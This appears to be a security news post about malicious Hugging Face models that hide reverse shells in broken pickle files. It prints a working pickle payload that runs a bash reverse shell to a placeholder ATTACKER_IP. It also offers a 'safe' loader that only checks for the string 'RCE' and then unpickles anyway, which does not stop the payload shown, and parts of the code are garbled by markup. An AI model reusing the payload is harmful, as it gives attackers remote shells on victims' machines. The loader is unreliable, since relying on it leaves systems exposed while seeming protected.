2025-02-10
Researchers have recently discovered two malicious machine learning (ML) models hosted on Hugging Face, a popular platform for sharing AI models. These models leverage a novel attack method involving “broken” pickle files to evade detection mechanisms. Once loaded, the models execute a reverse shell, establishing a connection to a hard-coded IP address, thereby granting attackers remote access to the victim’s system.
Understanding the Attack
Pickle files are commonly used in Python for serializing and deserializing objects. However, they can be exploited to execute arbitrary code during the deserialization process. In this case, the attackers crafted malicious pickle files embedded within the ML models. When these models are loaded, the pickle files trigger the execution of a reverse shell, bypassing traditional security checks.
Practical Demonstration
To understand how this attack works, let’s explore a basic example of how pickle files can be exploited. Below is a Python script demonstrating a simple reverse shell using pickle:
import pickle
import os
import socket
class MaliciousPayload:
def <strong>reduce</strong>(self):
return (os.system, ('bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1',))
<h1>Serialize the malicious payload</h1>
malicious_pickle = pickle.dumps(MaliciousPayload())
<h1>Save the payload to a file</h1>
with open('malicious_model.pkl', 'wb') as f:
f.write(malicious_pickle)
To protect against such attacks, always validate and sanitize pickle files before deserialization. Here’s a safer way to load pickle files:
import pickle
def safe_load_pickle(file_path):
with open(file_path, 'rb') as f:
data = f.read()
if b'RCE' in data: # Simple check for malicious patterns
raise ValueError("Malicious pickle file detected!")
return pickle.loads(data)
Mitigation Strategies
- Avoid Untrusted Sources: Only load models and pickle files from trusted sources.
- Use Safer Alternatives: Consider using JSON or other serialization formats that do not execute code.
- Sandboxing: Run ML models in isolated environments to limit the impact of potential exploits.
- Static Analysis: Analyze pickle files for suspicious patterns before loading them.
What Undercode Say
The discovery of malicious ML models on Hugging Face highlights the growing sophistication of cyberattacks targeting AI ecosystems. As AI and ML technologies become more integrated into critical systems, the security of these systems must be prioritized. The use of pickle files for serialization, while convenient, introduces significant risks due to their ability to execute arbitrary code.
To mitigate such risks, developers and organizations should adopt a multi-layered security approach. This includes:
– Regularly updating dependencies and libraries to patch known vulnerabilities.
– Implementing strict access controls and monitoring for suspicious activities.
– Educating teams about the risks associated with deserialization attacks.
Additionally, leveraging Linux-based security tools can enhance protection. For instance, using `AppArmor` or `SELinux` to restrict the permissions of processes can prevent reverse shells from establishing connections. Commands like `netstat -tuln` can help monitor active connections and detect unauthorized access.
For further reading on securing ML models and pickle files, refer to the following resources:
– Hugging Face Security Best Practices
– Python Pickle Documentation
– Linux Security Modules
By staying vigilant and adopting robust security practices, the AI community can continue to innovate while minimizing the risks posed by malicious actors.
References:
Hackers Feeds, Undercode AI
